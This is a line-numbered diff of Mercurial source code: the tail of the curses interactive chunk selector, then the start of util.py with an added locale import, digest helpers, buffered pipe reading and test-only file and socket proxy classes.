1891 1888 elif keypressed in ["J", "KEY_NPAGE"]:
1892 1889 self.downarrowshiftevent()
1893 1890 elif keypressed in ["l", "KEY_RIGHT"]:
1894 1891 self.rightarrowevent()
1895 1892 elif keypressed in ["h", "KEY_LEFT"]:
1896 1893 self.leftarrowevent()
1897 1894 elif keypressed in ["H", "KEY_SLEFT"]:
1898 1895 self.leftarrowshiftevent()
1899 1896 elif keypressed in ["q"]:
1900 1897 raise error.Abort(_(b'user quit'))
1901 1898 elif keypressed in ['a']:
1902 1899 self.flipselections()
1903 1900 elif keypressed in ["c"]:
1904 1901 return True
1905 1902 elif keypressed in ["r"]:
1906 1903 if self.reviewcommit():
1907 1904 self.opts[b'review'] = True
1908 1905 return True
1909 1906 elif test and keypressed in ["R"]:
1910 1907 self.opts[b'review'] = True
1911 1908 return True
1912 1909 elif keypressed in [" ", "x"]:
1913 1910 self.toggleapply()
1914 1911 elif keypressed in ["\n", "KEY_ENTER"]:
1915 1912 self.toggleapply()
1916 1913 self.nextsametype(test=test)
1917 1914 elif keypressed in ["X"]:
1918 1915 self.toggleallbetween()
1919 1916 elif keypressed in ["A"]:
1920 1917 self.toggleall()
1921 1918 elif keypressed in ["e"]:
1922 1919 self.toggleedit(test=test)
1923 1920 elif keypressed in ["f"]:
1924 1921 self.togglefolded()
1925 1922 elif keypressed in ["F"]:
1926 1923 self.togglefolded(foldparent=True)
1927 1924 elif keypressed in ["m"]:
1928 1925 self.commitMessageWindow()
1929 1926 elif keypressed in ["g", "KEY_HOME"]:
1930 1927 self.handlefirstlineevent()
1931 1928 elif keypressed in ["G", "KEY_END"]:
1932 1929 self.handlelastlineevent()
1933 1930 elif keypressed in ["?"]:
1934 1931 self.helpwindow()
1935 1932 self.stdscr.clear()
1936 1933 self.stdscr.refresh()
1937 1934 elif keypressed in [curses.ascii.ctrl("L")]:
1938 1935 # scroll the current line to the top of the screen, and redraw
1939 1936 # everything
1940 1937 self.scrolllines(self.selecteditemstartline)
1941 1938 self.stdscr.clear()
1942 1939 self.stdscr.refresh()
1943 1940
1944 1941 def main(self, stdscr):
1945 1942 """
1946 1943 method to be wrapped by curses.wrapper() for selecting chunks.
1947 1944 """
1948 1945
1949 1946 origsigwinch = sentinel = object()
1950 1947 if util.safehasattr(signal, b'SIGWINCH'):
1951 1948 origsigwinch = signal.signal(signal.SIGWINCH, self.sigwinchhandler)
1952 1949 try:
1953 1950 return self._main(stdscr)
1954 1951 finally:
1955 1952 if origsigwinch is not sentinel:
1956 1953 signal.signal(signal.SIGWINCH, origsigwinch)
1957 1954
1958 1955 def _main(self, stdscr):
1959 1956 self.stdscr = stdscr
1960 1957 # error during initialization, cannot be printed in the curses
1961 1958 # interface, it should be printed by the calling code
1962 1959 self.initexc = None
1963 1960 self.yscreensize, self.xscreensize = self.stdscr.getmaxyx()
1964 1961
1965 1962 curses.start_color()
1966 1963 try:
1967 1964 curses.use_default_colors()
1968 1965 except curses.error:
1969 1966 self.usecolor = False
1970 1967
1971 1968 # In some situations we may have some cruft left on the "alternate
1972 1969 # screen" from another program (or previous iterations of ourself), and
1973 1970 # we won't clear it if the scroll region is small enough to comfortably
1974 1971 # fit on the terminal.
1975 1972 self.stdscr.clear()
1976 1973
1977 1974 # don't display the cursor
1978 1975 try:
1979 1976 curses.curs_set(0)
1980 1977 except curses.error:
1981 1978 pass
1982 1979
1983 1980 # available colors: black, blue, cyan, green, magenta, white, yellow
1984 1981 # init_pair(color_id, foreground_color, background_color)
1985 1982 self.initcolorpair(None, None, name=b"normal")
1986 1983 self.initcolorpair(
1987 1984 curses.COLOR_WHITE, curses.COLOR_MAGENTA, name=b"selected"
1988 1985 )
1989 1986 self.initcolorpair(curses.COLOR_RED, None, name=b"deletion")
1990 1987 self.initcolorpair(curses.COLOR_GREEN, None, name=b"addition")
1991 1988 self.initcolorpair(
1992 1989 curses.COLOR_WHITE, curses.COLOR_BLUE, name=b"legend"
1993 1990 )
1994 1991 # newwin([height, width,] begin_y, begin_x)
1995 1992 self.statuswin = curses.newwin(self.numstatuslines, 0, 0, 0)
1996 1993 self.statuswin.keypad(1) # interpret arrow-key, etc. esc sequences
1997 1994
1998 1995 # figure out how much space to allocate for the chunk-pad which is
1999 1996 # used for displaying the patch
2000 1997
2001 1998 # stupid hack to prevent getnumlinesdisplayed from failing
2002 1999 self.chunkpad = curses.newpad(1, self.xscreensize)
2003 2000
2004 2001 # add 1 so to account for last line text reaching end of line
2005 2002 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
2006 2003
2007 2004 try:
2008 2005 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
2009 2006 except curses.error:
2010 2007 self.initexc = fallbackerror(
2011 2008 _(b'this diff is too large to be displayed')
2012 2009 )
2013 2010 return
2014 2011 # initialize selecteditemendline (initial start-line is 0)
2015 2012 self.selecteditemendline = self.getnumlinesdisplayed(
2016 2013 self.currentselecteditem, recursechildren=False
2017 2014 )
2018 2015
2019 2016 while True:
2020 2017 self.updatescreen()
2021 2018 try:
2022 2019 with self.ui.timeblockedsection(b'crecord'):
2023 2020 keypressed = self.statuswin.getkey()
2024 2021 if self.errorstr is not None:
2025 2022 self.errorstr = None
2026 2023 continue
2027 2024 except curses.error:
2028 2025 keypressed = b"foobar"
2029 2026 if self.handlekeypressed(keypressed):
2030 2027 break
2031 2028
2032 2029 if self.commenttext != b"":
2033 2030 whitespaceremoved = re.sub(
2034 2031 br"(?m)^\s.*(\n|$)", b"", self.commenttext
2035 2032 )
2036 2033 if whitespaceremoved != b"":
2037 2034 self.opts[b'message'] = self.commenttext
@@ -1,3628 +1,3658 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 import locale
25 26 import mmap
26 27 import os
27 28 import platform as pyplatform
28 29 import re as remod
29 30 import shutil
30 31 import socket
31 32 import stat
32 33 import sys
33 34 import time
34 35 import traceback
35 36 import warnings
36 37
37 38 from .thirdparty import attr
38 39 from .pycompat import (
39 40 delattr,
40 41 getattr,
41 42 open,
42 43 setattr,
43 44 )
44 45 from hgdemandimport import tracing
45 46 from . import (
46 47 encoding,
47 48 error,
48 49 i18n,
49 50 node as nodemod,
50 51 policy,
51 52 pycompat,
52 53 urllibcompat,
53 54 )
54 55 from .utils import (
55 56 compression,
56 57 hashutil,
57 58 procutil,
58 59 stringutil,
59 60 )
60 61
61 62 base85 = policy.importmod('base85')
62 63 osutil = policy.importmod('osutil')
63 64
64 65 b85decode = base85.b85decode
65 66 b85encode = base85.b85encode
66 67
67 68 cookielib = pycompat.cookielib
68 69 httplib = pycompat.httplib
69 70 pickle = pycompat.pickle
70 71 safehasattr = pycompat.safehasattr
71 72 socketserver = pycompat.socketserver
72 73 bytesio = pycompat.bytesio
73 74 # TODO deprecate stringio name, as it is a lie on Python 3.
74 75 stringio = bytesio
75 76 xmlrpclib = pycompat.xmlrpclib
76 77
77 78 httpserver = urllibcompat.httpserver
78 79 urlerr = urllibcompat.urlerr
79 80 urlreq = urllibcompat.urlreq
80 81
81 82 # workaround for win32mbcs
82 83 _filenamebytestr = pycompat.bytestr
83 84
84 85 if pycompat.iswindows:
85 86 from . import windows as platform
86 87 else:
87 88 from . import posix as platform
88 89
89 90 _ = i18n._
90 91
91 92 bindunixsocket = platform.bindunixsocket
92 93 cachestat = platform.cachestat
93 94 checkexec = platform.checkexec
94 95 checklink = platform.checklink
95 96 copymode = platform.copymode
96 97 expandglobs = platform.expandglobs
97 98 getfsmountpoint = platform.getfsmountpoint
98 99 getfstype = platform.getfstype
99 100 groupmembers = platform.groupmembers
100 101 groupname = platform.groupname
101 102 isexec = platform.isexec
102 103 isowner = platform.isowner
103 104 listdir = osutil.listdir
104 105 localpath = platform.localpath
105 106 lookupreg = platform.lookupreg
106 107 makedir = platform.makedir
107 108 nlinks = platform.nlinks
108 109 normpath = platform.normpath
109 110 normcase = platform.normcase
110 111 normcasespec = platform.normcasespec
111 112 normcasefallback = platform.normcasefallback
112 113 openhardlinks = platform.openhardlinks
113 114 oslink = platform.oslink
114 115 parsepatchoutput = platform.parsepatchoutput
115 116 pconvert = platform.pconvert
116 117 poll = platform.poll
117 118 posixfile = platform.posixfile
118 119 readlink = platform.readlink
119 120 rename = platform.rename
120 121 removedirs = platform.removedirs
121 122 samedevice = platform.samedevice
122 123 samefile = platform.samefile
123 124 samestat = platform.samestat
124 125 setflags = platform.setflags
125 126 split = platform.split
126 127 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
127 128 statisexec = platform.statisexec
128 129 statislink = platform.statislink
129 130 umask = platform.umask
130 131 unlink = platform.unlink
131 132 username = platform.username
132 133
133 134
134 135 def setumask(val):
135 136 ''' updates the umask. used by chg server '''
136 137 if pycompat.iswindows:
137 138 return
138 139 os.umask(val)
139 140 global umask
140 141 platform.umask = umask = val & 0o777
141 142
142 143
143 144 # small compat layer
144 145 compengines = compression.compengines
145 146 SERVERROLE = compression.SERVERROLE
146 147 CLIENTROLE = compression.CLIENTROLE
147 148
148 149 try:
149 150 recvfds = osutil.recvfds
150 151 except AttributeError:
151 152 pass
152 153
153 154 # Python compatibility
154 155
155 156 _notset = object()
156 157
157 158
158 159 def bitsfrom(container):
159 160 bits = 0
160 161 for bit in container:
161 162 bits |= bit
162 163 return bits
163 164
164 165
165 166 # python 2.6 still have deprecation warning enabled by default. We do not want
166 167 # to display anything to standard user so detect if we are running test and
167 168 # only use python deprecation warning in this case.
168 169 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
169 170 if _dowarn:
170 171 # explicitly unfilter our warning for python 2.7
171 172 #
172 173 # The option of setting PYTHONWARNINGS in the test runner was investigated.
173 174 # However, module name set through PYTHONWARNINGS was exactly matched, so
174 175 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
175 176 # makes the whole PYTHONWARNINGS thing useless for our usecase.
176 177 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
177 178 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
178 179 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
179 180 if _dowarn and pycompat.ispy3:
180 181 # silence warning emitted by passing user string to re.sub()
181 182 warnings.filterwarnings(
182 183 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
183 184 )
184 185 warnings.filterwarnings(
185 186 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
186 187 )
187 188 # TODO: reinvent imp.is_frozen()
188 189 warnings.filterwarnings(
189 190 'ignore',
190 191 'the imp module is deprecated',
191 192 DeprecationWarning,
192 193 'mercurial',
193 194 )
194 195
195 196
196 197 def nouideprecwarn(msg, version, stacklevel=1):
197 198 """Issue an python native deprecation warning
198 199
199 200 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
200 201 """
201 202 if _dowarn:
202 203 msg += (
203 204 b"\n(compatibility will be dropped after Mercurial-%s,"
204 205 b" update your code.)"
205 206 ) % version
206 207 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 208
208 209
209 210 DIGESTS = {
210 211 b'md5': hashlib.md5,
211 212 b'sha1': hashutil.sha1,
212 213 b'sha512': hashlib.sha512,
213 214 }
214 215 # List of digest types from strongest to weakest
215 216 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
216 217
217 218 for k in DIGESTS_BY_STRENGTH:
218 219 assert k in DIGESTS
219 220
220 221
221 222 class digester(object):
222 223 """helper to compute digests.
223 224
224 225 This helper can be used to compute one or more digests given their name.
225 226
226 227 >>> d = digester([b'md5', b'sha1'])
227 228 >>> d.update(b'foo')
228 229 >>> [k for k in sorted(d)]
229 230 ['md5', 'sha1']
230 231 >>> d[b'md5']
231 232 'acbd18db4cc2f85cedef654fccc4a4d8'
232 233 >>> d[b'sha1']
233 234 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
234 235 >>> digester.preferred([b'md5', b'sha1'])
235 236 'sha1'
236 237 """
237 238
238 239 def __init__(self, digests, s=b''):
239 240 self._hashes = {}
240 241 for k in digests:
241 242 if k not in DIGESTS:
242 243 raise error.Abort(_(b'unknown digest type: %s') % k)
243 244 self._hashes[k] = DIGESTS[k]()
244 245 if s:
245 246 self.update(s)
246 247
247 248 def update(self, data):
248 249 for h in self._hashes.values():
249 250 h.update(data)
250 251
251 252 def __getitem__(self, key):
252 253 if key not in DIGESTS:
253 254 raise error.Abort(_(b'unknown digest type: %s') % k)
254 255 return nodemod.hex(self._hashes[key].digest())
255 256
256 257 def __iter__(self):
257 258 return iter(self._hashes)
258 259
259 260 @staticmethod
260 261 def preferred(supported):
261 262 """returns the strongest digest type in both supported and DIGESTS."""
262 263
263 264 for k in DIGESTS_BY_STRENGTH:
264 265 if k in supported:
265 266 return k
266 267 return None
267 268
268 269
269 270 class digestchecker(object):
270 271 """file handle wrapper that additionally checks content against a given
271 272 size and digests.
272 273
273 274 d = digestchecker(fh, size, {'md5': '...'})
274 275
275 276 When multiple digests are given, all of them are validated.
276 277 """
277 278
278 279 def __init__(self, fh, size, digests):
279 280 self._fh = fh
280 281 self._size = size
281 282 self._got = 0
282 283 self._digests = dict(digests)
283 284 self._digester = digester(self._digests.keys())
284 285
285 286 def read(self, length=-1):
286 287 content = self._fh.read(length)
287 288 self._digester.update(content)
288 289 self._got += len(content)
289 290 return content
290 291
291 292 def validate(self):
292 293 if self._size != self._got:
293 294 raise error.Abort(
294 295 _(b'size mismatch: expected %d, got %d')
295 296 % (self._size, self._got)
296 297 )
297 298 for k, v in self._digests.items():
298 299 if v != self._digester[k]:
299 300 # i18n: first parameter is a digest name
300 301 raise error.Abort(
301 302 _(b'%s mismatch: expected %s, got %s')
302 303 % (k, v, self._digester[k])
303 304 )
304 305
305 306
306 307 try:
307 308 buffer = buffer
308 309 except NameError:
309 310
310 311 def buffer(sliceable, offset=0, length=None):
311 312 if length is not None:
312 313 return memoryview(sliceable)[offset : offset + length]
313 314 return memoryview(sliceable)[offset:]
314 315
315 316
316 317 _chunksize = 4096
317 318
318 319
319 320 class bufferedinputpipe(object):
320 321 """a manually buffered input pipe
321 322
322 323 Python will not let us use buffered IO and lazy reading with 'polling' at
323 324 the same time. We cannot probe the buffer state and select will not detect
324 325 that data are ready to read if they are already buffered.
325 326
326 327 This class let us work around that by implementing its own buffering
327 328 (allowing efficient readline) while offering a way to know if the buffer is
328 329 empty from the output (allowing collaboration of the buffer with polling).
329 330
330 331 This class lives in the 'util' module because it makes use of the 'os'
331 332 module from the python stdlib.
332 333 """
333 334
334 335 def __new__(cls, fh):
335 336 # If we receive a fileobjectproxy, we need to use a variation of this
336 337 # class that notifies observers about activity.
337 338 if isinstance(fh, fileobjectproxy):
338 339 cls = observedbufferedinputpipe
339 340
340 341 return super(bufferedinputpipe, cls).__new__(cls)
341 342
342 343 def __init__(self, input):
343 344 self._input = input
344 345 self._buffer = []
345 346 self._eof = False
346 347 self._lenbuf = 0
347 348
348 349 @property
349 350 def hasbuffer(self):
350 351 """True is any data is currently buffered
351 352
352 353 This will be used externally a pre-step for polling IO. If there is
353 354 already data then no polling should be set in place."""
354 355 return bool(self._buffer)
355 356
356 357 @property
357 358 def closed(self):
358 359 return self._input.closed
359 360
360 361 def fileno(self):
361 362 return self._input.fileno()
362 363
363 364 def close(self):
364 365 return self._input.close()
365 366
366 367 def read(self, size):
367 368 while (not self._eof) and (self._lenbuf < size):
368 369 self._fillbuffer()
369 370 return self._frombuffer(size)
370 371
371 372 def unbufferedread(self, size):
372 373 if not self._eof and self._lenbuf == 0:
373 374 self._fillbuffer(max(size, _chunksize))
374 375 return self._frombuffer(min(self._lenbuf, size))
375 376
376 377 def readline(self, *args, **kwargs):
377 378 if len(self._buffer) > 1:
378 379 # this should not happen because both read and readline end with a
379 380 # _frombuffer call that collapse it.
380 381 self._buffer = [b''.join(self._buffer)]
381 382 self._lenbuf = len(self._buffer[0])
382 383 lfi = -1
383 384 if self._buffer:
384 385 lfi = self._buffer[-1].find(b'\n')
385 386 while (not self._eof) and lfi < 0:
386 387 self._fillbuffer()
387 388 if self._buffer:
388 389 lfi = self._buffer[-1].find(b'\n')
389 390 size = lfi + 1
390 391 if lfi < 0: # end of file
391 392 size = self._lenbuf
392 393 elif len(self._buffer) > 1:
393 394 # we need to take previous chunks into account
394 395 size += self._lenbuf - len(self._buffer[-1])
395 396 return self._frombuffer(size)
396 397
397 398 def _frombuffer(self, size):
398 399 """return at most 'size' data from the buffer
399 400
400 401 The data are removed from the buffer."""
401 402 if size == 0 or not self._buffer:
402 403 return b''
403 404 buf = self._buffer[0]
404 405 if len(self._buffer) > 1:
405 406 buf = b''.join(self._buffer)
406 407
407 408 data = buf[:size]
408 409 buf = buf[len(data) :]
409 410 if buf:
410 411 self._buffer = [buf]
411 412 self._lenbuf = len(buf)
412 413 else:
413 414 self._buffer = []
414 415 self._lenbuf = 0
415 416 return data
416 417
417 418 def _fillbuffer(self, size=_chunksize):
418 419 """read data to the buffer"""
419 420 data = os.read(self._input.fileno(), size)
420 421 if not data:
421 422 self._eof = True
422 423 else:
423 424 self._lenbuf += len(data)
424 425 self._buffer.append(data)
425 426
426 427 return data
427 428
428 429
429 430 def mmapread(fp, size=None):
430 431 if size == 0:
431 432 # size of 0 to mmap.mmap() means "all data"
432 433 # rather than "zero bytes", so special case that.
433 434 return b''
434 435 elif size is None:
435 436 size = 0
436 437 try:
437 438 fd = getattr(fp, 'fileno', lambda: fp)()
438 439 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
439 440 except ValueError:
440 441 # Empty files cannot be mmapped, but mmapread should still work. Check
441 442 # if the file is empty, and if so, return an empty buffer.
442 443 if os.fstat(fd).st_size == 0:
443 444 return b''
444 445 raise
445 446
446 447
447 448 class fileobjectproxy(object):
448 449 """A proxy around file objects that tells a watcher when events occur.
449 450
450 451 This type is intended to only be used for testing purposes. Think hard
451 452 before using it in important code.
452 453 """
453 454
454 455 __slots__ = (
455 456 '_orig',
456 457 '_observer',
457 458 )
458 459
459 460 def __init__(self, fh, observer):
460 461 object.__setattr__(self, '_orig', fh)
461 462 object.__setattr__(self, '_observer', observer)
462 463
463 464 def __getattribute__(self, name):
464 465 ours = {
465 466 '_observer',
466 467 # IOBase
467 468 'close',
468 469 # closed if a property
469 470 'fileno',
470 471 'flush',
471 472 'isatty',
472 473 'readable',
473 474 'readline',
474 475 'readlines',
475 476 'seek',
476 477 'seekable',
477 478 'tell',
478 479 'truncate',
479 480 'writable',
480 481 'writelines',
481 482 # RawIOBase
482 483 'read',
483 484 'readall',
484 485 'readinto',
485 486 'write',
486 487 # BufferedIOBase
487 488 # raw is a property
488 489 'detach',
489 490 # read defined above
490 491 'read1',
491 492 # readinto defined above
492 493 # write defined above
493 494 }
494 495
495 496 # We only observe some methods.
496 497 if name in ours:
497 498 return object.__getattribute__(self, name)
498 499
499 500 return getattr(object.__getattribute__(self, '_orig'), name)
500 501
501 502 def __nonzero__(self):
502 503 return bool(object.__getattribute__(self, '_orig'))
503 504
504 505 __bool__ = __nonzero__
505 506
506 507 def __delattr__(self, name):
507 508 return delattr(object.__getattribute__(self, '_orig'), name)
508 509
509 510 def __setattr__(self, name, value):
510 511 return setattr(object.__getattribute__(self, '_orig'), name, value)
511 512
512 513 def __iter__(self):
513 514 return object.__getattribute__(self, '_orig').__iter__()
514 515
515 516 def _observedcall(self, name, *args, **kwargs):
516 517 # Call the original object.
517 518 orig = object.__getattribute__(self, '_orig')
518 519 res = getattr(orig, name)(*args, **kwargs)
519 520
520 521 # Call a method on the observer of the same name with arguments
521 522 # so it can react, log, etc.
522 523 observer = object.__getattribute__(self, '_observer')
523 524 fn = getattr(observer, name, None)
524 525 if fn:
525 526 fn(res, *args, **kwargs)
526 527
527 528 return res
528 529
529 530 def close(self, *args, **kwargs):
530 531 return object.__getattribute__(self, '_observedcall')(
531 532 'close', *args, **kwargs
532 533 )
533 534
534 535 def fileno(self, *args, **kwargs):
535 536 return object.__getattribute__(self, '_observedcall')(
536 537 'fileno', *args, **kwargs
537 538 )
538 539
539 540 def flush(self, *args, **kwargs):
540 541 return object.__getattribute__(self, '_observedcall')(
541 542 'flush', *args, **kwargs
542 543 )
543 544
544 545 def isatty(self, *args, **kwargs):
545 546 return object.__getattribute__(self, '_observedcall')(
546 547 'isatty', *args, **kwargs
547 548 )
548 549
549 550 def readable(self, *args, **kwargs):
550 551 return object.__getattribute__(self, '_observedcall')(
551 552 'readable', *args, **kwargs
552 553 )
553 554
554 555 def readline(self, *args, **kwargs):
555 556 return object.__getattribute__(self, '_observedcall')(
556 557 'readline', *args, **kwargs
557 558 )
558 559
559 560 def readlines(self, *args, **kwargs):
560 561 return object.__getattribute__(self, '_observedcall')(
561 562 'readlines', *args, **kwargs
562 563 )
563 564
564 565 def seek(self, *args, **kwargs):
565 566 return object.__getattribute__(self, '_observedcall')(
566 567 'seek', *args, **kwargs
567 568 )
568 569
569 570 def seekable(self, *args, **kwargs):
570 571 return object.__getattribute__(self, '_observedcall')(
571 572 'seekable', *args, **kwargs
572 573 )
573 574
574 575 def tell(self, *args, **kwargs):
575 576 return object.__getattribute__(self, '_observedcall')(
576 577 'tell', *args, **kwargs
577 578 )
578 579
579 580 def truncate(self, *args, **kwargs):
580 581 return object.__getattribute__(self, '_observedcall')(
581 582 'truncate', *args, **kwargs
582 583 )
583 584
584 585 def writable(self, *args, **kwargs):
585 586 return object.__getattribute__(self, '_observedcall')(
586 587 'writable', *args, **kwargs
587 588 )
588 589
589 590 def writelines(self, *args, **kwargs):
590 591 return object.__getattribute__(self, '_observedcall')(
591 592 'writelines', *args, **kwargs
592 593 )
593 594
594 595 def read(self, *args, **kwargs):
595 596 return object.__getattribute__(self, '_observedcall')(
596 597 'read', *args, **kwargs
597 598 )
598 599
599 600 def readall(self, *args, **kwargs):
600 601 return object.__getattribute__(self, '_observedcall')(
601 602 'readall', *args, **kwargs
602 603 )
603 604
604 605 def readinto(self, *args, **kwargs):
605 606 return object.__getattribute__(self, '_observedcall')(
606 607 'readinto', *args, **kwargs
607 608 )
608 609
609 610 def write(self, *args, **kwargs):
610 611 return object.__getattribute__(self, '_observedcall')(
611 612 'write', *args, **kwargs
612 613 )
613 614
614 615 def detach(self, *args, **kwargs):
615 616 return object.__getattribute__(self, '_observedcall')(
616 617 'detach', *args, **kwargs
617 618 )
618 619
619 620 def read1(self, *args, **kwargs):
620 621 return object.__getattribute__(self, '_observedcall')(
621 622 'read1', *args, **kwargs
622 623 )
623 624
624 625
625 626 class observedbufferedinputpipe(bufferedinputpipe):
626 627 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
627 628
628 629 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
629 630 bypass ``fileobjectproxy``. Because of this, we need to make
630 631 ``bufferedinputpipe`` aware of these operations.
631 632
632 633 This variation of ``bufferedinputpipe`` can notify observers about
633 634 ``os.read()`` events. It also re-publishes other events, such as
634 635 ``read()`` and ``readline()``.
635 636 """
636 637
637 638 def _fillbuffer(self):
638 639 res = super(observedbufferedinputpipe, self)._fillbuffer()
639 640
640 641 fn = getattr(self._input._observer, 'osread', None)
641 642 if fn:
642 643 fn(res, _chunksize)
643 644
644 645 return res
645 646
646 647 # We use different observer methods because the operation isn't
647 648 # performed on the actual file object but on us.
648 649 def read(self, size):
649 650 res = super(observedbufferedinputpipe, self).read(size)
650 651
651 652 fn = getattr(self._input._observer, 'bufferedread', None)
652 653 if fn:
653 654 fn(res, size)
654 655
655 656 return res
656 657
657 658 def readline(self, *args, **kwargs):
658 659 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
659 660
660 661 fn = getattr(self._input._observer, 'bufferedreadline', None)
661 662 if fn:
662 663 fn(res)
663 664
664 665 return res
665 666
666 667
667 668 PROXIED_SOCKET_METHODS = {
668 669 'makefile',
669 670 'recv',
670 671 'recvfrom',
671 672 'recvfrom_into',
672 673 'recv_into',
673 674 'send',
674 675 'sendall',
675 676 'sendto',
676 677 'setblocking',
677 678 'settimeout',
678 679 'gettimeout',
679 680 'setsockopt',
680 681 }
681 682
682 683
683 684 class socketproxy(object):
684 685 """A proxy around a socket that tells a watcher when events occur.
685 686
686 687 This is like ``fileobjectproxy`` except for sockets.
687 688
688 689 This type is intended to only be used for testing purposes. Think hard
689 690 before using it in important code.
690 691 """
691 692
692 693 __slots__ = (
693 694 '_orig',
694 695 '_observer',
695 696 )
696 697
697 698 def __init__(self, sock, observer):
698 699 object.__setattr__(self, '_orig', sock)
699 700 object.__setattr__(self, '_observer', observer)
700 701
701 702 def __getattribute__(self, name):
702 703 if name in PROXIED_SOCKET_METHODS:
703 704 return object.__getattribute__(self, name)
704 705
705 706 return getattr(object.__getattribute__(self, '_orig'), name)
706 707
707 708 def __delattr__(self, name):
708 709 return delattr(object.__getattribute__(self, '_orig'), name)
709 710
710 711 def __setattr__(self, name, value):
711 712 return setattr(object.__getattribute__(self, '_orig'), name, value)
712 713
713 714 def __nonzero__(self):
714 715 return bool(object.__getattribute__(self, '_orig'))
715 716
716 717 __bool__ = __nonzero__
717 718
718 719 def _observedcall(self, name, *args, **kwargs):
719 720 # Call the original object.
720 721 orig = object.__getattribute__(self, '_orig')
721 722 res = getattr(orig, name)(*args, **kwargs)
722 723
723 724 # Call a method on the observer of the same name with arguments
724 725 # so it can react, log, etc.
725 726 observer = object.__getattribute__(self, '_observer')
726 727 fn = getattr(observer, name, None)
727 728 if fn:
728 729 fn(res, *args, **kwargs)
729 730
730 731 return res
731 732
732 733 def makefile(self, *args, **kwargs):
733 734 res = object.__getattribute__(self, '_observedcall')(
734 735 'makefile', *args, **kwargs
735 736 )
736 737
737 738 # The file object may be used for I/O. So we turn it into a
738 739 # proxy using our observer.
739 740 observer = object.__getattribute__(self, '_observer')
740 741 return makeloggingfileobject(
741 742 observer.fh,
742 743 res,
743 744 observer.name,
744 745 reads=observer.reads,
745 746 writes=observer.writes,
746 747 logdata=observer.logdata,
747 748 logdataapis=observer.logdataapis,
748 749 )
749 750
750 751 def recv(self, *args, **kwargs):
751 752 return object.__getattribute__(self, '_observedcall')(
752 753 'recv', *args, **kwargs
753 754 )
754 755
755 756 def recvfrom(self, *args, **kwargs):
756 757 return object.__getattribute__(self, '_observedcall')(
757 758 'recvfrom', *args, **kwargs
758 759 )
759 760
760 761 def recvfrom_into(self, *args, **kwargs):
761 762 return object.__getattribute__(self, '_observedcall')(
762 763 'recvfrom_into', *args, **kwargs
763 764 )
764 765
765 766 def recv_into(self, *args, **kwargs):
766 767 return object.__getattribute__(self, '_observedcall')(
767 768 'recv_info', *args, **kwargs
768 769 )
769 770
770 771 def send(self, *args, **kwargs):
771 772 return object.__getattribute__(self, '_observedcall')(
772 773 'send', *args, **kwargs
773 774 )
774 775
775 776 def sendall(self, *args, **kwargs):
776 777 return object.__getattribute__(self, '_observedcall')(
777 778 'sendall', *args, **kwargs
778 779 )
779 780
780 781 def sendto(self, *args, **kwargs):
781 782 return object.__getattribute__(self, '_observedcall')(
782 783 'sendto', *args, **kwargs
783 784 )
784 785
785 786 def setblocking(self, *args, **kwargs):
786 787 return object.__getattribute__(self, '_observedcall')(
787 788 'setblocking', *args, **kwargs
788 789 )
789 790
790 791 def settimeout(self, *args, **kwargs):
791 792 return object.__getattribute__(self, '_observedcall')(
792 793 'settimeout', *args, **kwargs
793 794 )
794 795
795 796 def gettimeout(self, *args, **kwargs):
796 797 return object.__getattribute__(self, '_observedcall')(
797 798 'gettimeout', *args, **kwargs
798 799 )
799 800
800 801 def setsockopt(self, *args, **kwargs):
801 802 return object.__getattribute__(self, '_observedcall')(
802 803 'setsockopt', *args, **kwargs
803 804 )
804 805
805 806
806 807 class baseproxyobserver(object):
807 808 def __init__(self, fh, name, logdata, logdataapis):
808 809 self.fh = fh
809 810 self.name = name
810 811 self.logdata = logdata
811 812 self.logdataapis = logdataapis
812 813
813 814 def _writedata(self, data):
814 815 if not self.logdata:
815 816 if self.logdataapis:
816 817 self.fh.write(b'\n')
817 818 self.fh.flush()
818 819 return
819 820
820 821 # Simple case writes all data on a single line.
821 822 if b'\n' not in data:
822 823 if self.logdataapis:
823 824 self.fh.write(b': %s\n' % stringutil.escapestr(data))
824 825 else:
825 826 self.fh.write(
826 827 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
827 828 )
828 829 self.fh.flush()
829 830 return
830 831
831 832 # Data with newlines is written to multiple lines.
832 833 if self.logdataapis:
833 834 self.fh.write(b':\n')
834 835
835 836 lines = data.splitlines(True)
836 837 for line in lines:
837 838 self.fh.write(
838 839 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
839 840 )
840 841 self.fh.flush()
841 842
842 843
843 844 class fileobjectobserver(baseproxyobserver):
844 845 """Logs file object activity."""
845 846
846 847 def __init__(
847 848 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
848 849 ):
849 850 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
850 851 self.reads = reads
851 852 self.writes = writes
852 853
853 854 def read(self, res, size=-1):
854 855 if not self.reads:
855 856 return
856 857 # Python 3 can return None from reads at EOF instead of empty strings.
